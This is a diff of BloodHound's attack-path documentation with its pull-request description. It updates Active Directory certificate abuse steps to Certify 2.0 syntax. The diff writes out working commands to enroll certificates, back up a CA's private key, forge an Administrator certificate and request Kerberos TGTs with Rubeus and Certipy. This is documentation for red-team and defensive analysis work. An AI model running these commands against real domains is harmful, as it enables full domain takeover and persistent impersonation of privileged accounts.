 Rubeus.exe asktgt /certificate:<cert base64> /user:TARGET$ /domain:DOMAIN /dc:DOMAIN_CONTROLLER
 ```
 

--- a/docs/resources/edges/adcs-esc9b.mdx
+++ b/docs/resources/edges/adcs-esc9b.mdx
@@ -175,10 +175,9 @@ This edge is related to the following MITRE ATT&CK tactic and techniques:
 
 * Certipy 4.0
 * [Certipy](https://github.com/ly4k/Certipy)
-* [GhostPack Certipy](https://github.com/GhostPack/Certify)
+* [GhostPack Certify](https://github.com/GhostPack/Certify)
 * [GhostPack Rubeus](https://github.com/GhostPack/Rubeus)
 * [Set-DomainObject](https://powersploit.readthedocs.io/en/latest/Recon/Set-DomainObject)
-* [CertUtil.exe](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil)
 * [LDAPSearch](https://linux.die.net/man/1/ldapsearch)
 * [LDAPModify](https://linux.die.net/man/1/ldapmodify)
 * [https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf](https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf)

--- a/docs/resources/edges/all-extended-rights.mdx
+++ b/docs/resources/edges/all-extended-rights.mdx
@@ -29,10 +29,10 @@ The following additional requirements must be met for a principal to be able to 
 2.  The principal has Enroll permission on the enterprise CA
 3.  The principal meets the issuance requirements and the requirements for subject name and subject alternative name defined by the template
 
-Certify can be used to enroll a certificate on Windows:
+Certify (2.0) can be used to enroll a certificate on Windows:
 
 ```bash
-Certify.exe request /ca:SERVER\\CA-NAME /template:TEMPLATE
+Certify.exe request --ca SERVER\\CA-NAME --template TEMPLATE
 ```
 
 Certipy can be used to enroll a certificate on Linux:

--- a/docs/resources/edges/all-extended-rights.mdx
+++ b/docs/resources/edges/all-extended-rights.mdx
@@ -31,8 +31,8 @@ The following additional requirements must be met for a principal to be able to 
 
 Certify (2.0) can be used to enroll a certificate on Windows:
 
-```bash
-Certify.exe request --ca SERVER\\CA-NAME --template TEMPLATE
+```cmd
+Certify.exe request --ca SERVER\CA-NAME --template TEMPLATE
 ```
 
 Certipy can be used to enroll a certificate on Linux:

--- a/docs/resources/edges/enroll.mdx
+++ b/docs/resources/edges/enroll.mdx
@@ -15,10 +15,10 @@ The following additional requirements must be met for a principal to be able to 
 2.  The principal has Enroll permission on the enterprise CA
 3.  The principal meets the issuance requirements and the requirements for subject name and subject alternative name defined by the template
 
-Certify can be used to enroll a certificate on Windows:
+Certify (2.0) can be used to enroll a certificate on Windows:
 
 ```bash
-Certify.exe request /ca:SERVER\\CA-NAME /template:TEMPLATE
+Certify.exe request --ca SERVER\\CA-NAME --template TEMPLATE
 ```
 
 Certipy can be used to enroll a certificate on Linux:

--- a/docs/resources/edges/enroll.mdx
+++ b/docs/resources/edges/enroll.mdx
@@ -17,8 +17,8 @@ The following additional requirements must be met for a principal to be able to 
 
 Certify (2.0) can be used to enroll a certificate on Windows:
 
-```bash
-Certify.exe request --ca SERVER\\CA-NAME --template TEMPLATE
+```cmd
+Certify.exe request --ca SERVER\CA-NAME --template TEMPLATE
 ```
 
 Certipy can be used to enroll a certificate on Linux:

--- a/docs/resources/edges/golden-cert.mdx
+++ b/docs/resources/edges/golden-cert.mdx
@@ -15,60 +15,46 @@ It may not be possible to obtain the certificate private key if it is protected 
 
 #### Step 1
 
-Obtain CA certificate incl. private key - using built-in GUI (certsrv.msc)
+Obtain CA certificate incl. private key
 
-1.  Open certsrv.msc as Administrator on the enterprise CA host.
-2.  Right-click on the enterprise CA and select "All Tasks" followed by "Back up CA...".
-3.  Click "Next", select "Private key and CA certificate", and select the location folder.
-4.  Click "Next", and set a password.
-5.  Click "Next" and click "Finish" to back up the certificate as a .p12 file.
+Use Certify (2.0) to export all certificates in the local machine certificate store and identify the CA certificate by the name of the CA:
+
+```cmd
+Certify.exe manage-self --dump-certs
+```
 
 #### Step 2
 
-Obtain CA certificate incl. private key - using commandline tools
-
-* Print all certificates of the host using SharpDPAPI.  The enterprise CA certificate is the one where issuer and subject are identical.
-```
-SharpDPAPI.exe certificates /machine
-```
-* Save the private key in .key file (e.g. cert.key) and the certificate in .pem file (cert.pem) in the same folder.
-* Create a .pfx version of the CA certificate using certutil:
-```
-certutil.exe -MergePFX .\\cert.pem .\\cert.pfx
-```
-* Set password when prompted.
-
-#### Step 3
-
 Forge certificate and obtain a TGT as targeted principal.
 
-* Forge a certificate of a target principal using ForgeCert:
+Forge a certificate of a target principal:
+```cmd
+Certify.exe forge --ca-cert <pfx-path/base64-pfx> --upn Administrator --sid S-1-5-21-976219687-1556195986-4104514715-500
 ```
-ForgeCert.exe --CaCertPath cert.pfx --CaCertPassword "password123!" --Subject "CN=User" --SubjectAltName "roshi@dumpster.fire" --NewCertPath target.pfx --NewCertPassword "NewPassword123!"
-```
-* Request a TGT for the targeted principal using the certificate with Rubeus:
-```
-Rubeus.exe asktgt /user:Roshi /domain:dumpster.fire /certificate:target.pfx /password:NewPassword123!
+
+Request a TGT for the targeted principal using the certificate with Rubeus:
+```cmd
+Rubeus.exe asktgt /user:Administrator /domain:dumpster.fire /certificate:<pfx-path/base64-pfx>
 ```
 ### Linux
 
 #### Step 1
 
-* Back up the CA certificate with the credentials of a user with admin access on the enterprise CA host using Certipy.  The enterprise CA certificate is the one where issuer and subject are identical.
-```
-certipy ca -backup -ca 'dumpster-DC01-CA' -username jd@dumpster.fire -password 'Password123!
+Back up the CA certificate with the credentials of a user with admin access on the enterprise CA host using Certipy, and identify the CA certificate by the name of the CA.
+```bash
+certipy ca -backup -ca 'dumpster-DC01-CA' -username jd@dumpster.fire -password 'Password123!'
 ```
 #### Step 2
 
 Forge a certificate of a target principal:
-```
-certipy forge -ca-pfx dumpster-DC01-CA.pfx -upn Roshi@dumpster.fire -subject 'CN=Roshi,OU=Users,OU=Tier0,DC=dumpster,DC=fire
+```bash
+certipy forge -ca-pfx dumpster-DC01-CA.pfx -upn Roshi@dumpster.fire -subject 'CN=Roshi,OU=Users,OU=Tier0,DC=dumpster,DC=fire'
 ```
 #### Step 3
 
 Request a TGT for the targeted principal using the certificate against a given DC:
-```
- certipy auth -pfx roshi_forged.pfx -dc-ip '192.168.100.10
+```bash
+ certipy auth -pfx roshi_forged.pfx -dc-ip '192.168.100.10'
 ```
 ## Opsec Considerations
 
@@ -83,9 +69,7 @@ This edge is related to the following MITRE ATT&CK tactic and techniques:
 ### Abuse and Opsec references
 
 * [https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf](https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf)
-* [https://github.com/GhostPack/SharpDPAPI](https://github.com/GhostPack/SharpDPAPI)
-* [https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil)
-* [https://github.com/GhostPack/ForgeCert](https://github.com/GhostPack/ForgeCert)
-* [https://github.com/GhostPack/Rubeus](https://github.com/GhostPack/Rubeus)
+* [https://github.com/GhostPack/Certify/wiki/3-%E2%80%90-Domain-Persistence-Techniques#dpersist1---forging-certificates-with-stolen-ca-certificates](https://github.com/GhostPack/Certify/wiki/3-%E2%80%90-Domain-Persistence-Techniques#dpersist1---forging-certificates-with-stolen-ca-certificates)
+* [https://github.com/GhostPack/Certify](https://github.com/GhostPack/Certify)
 * [https://github.com/GhostPack/Rubeus](https://github.com/GhostPack/Rubeus)
 


### PR DESCRIPTION
Update edge abuse info to use Certify 2.0 command format.

Corresponding to this BH PR: https://github.com/SpecterOps/BloodHound/pull/1759

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **Documentation**
  * Windows docs updated to Certify (2.0) with long-form flags and CMD/PowerShell examples.
  * Certificate handling simplified: PFX output changed to inline base64 on stdout; removed intermediate file/merge steps.
  * Kerberos flow streamlined: TGT requests accept inline base64 certificates; added optional klist TGT verification and renumbered steps.
  * Linux docs aligned: explicit template parameter, updated Certipy/Certify links, and minor formatting fixes.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->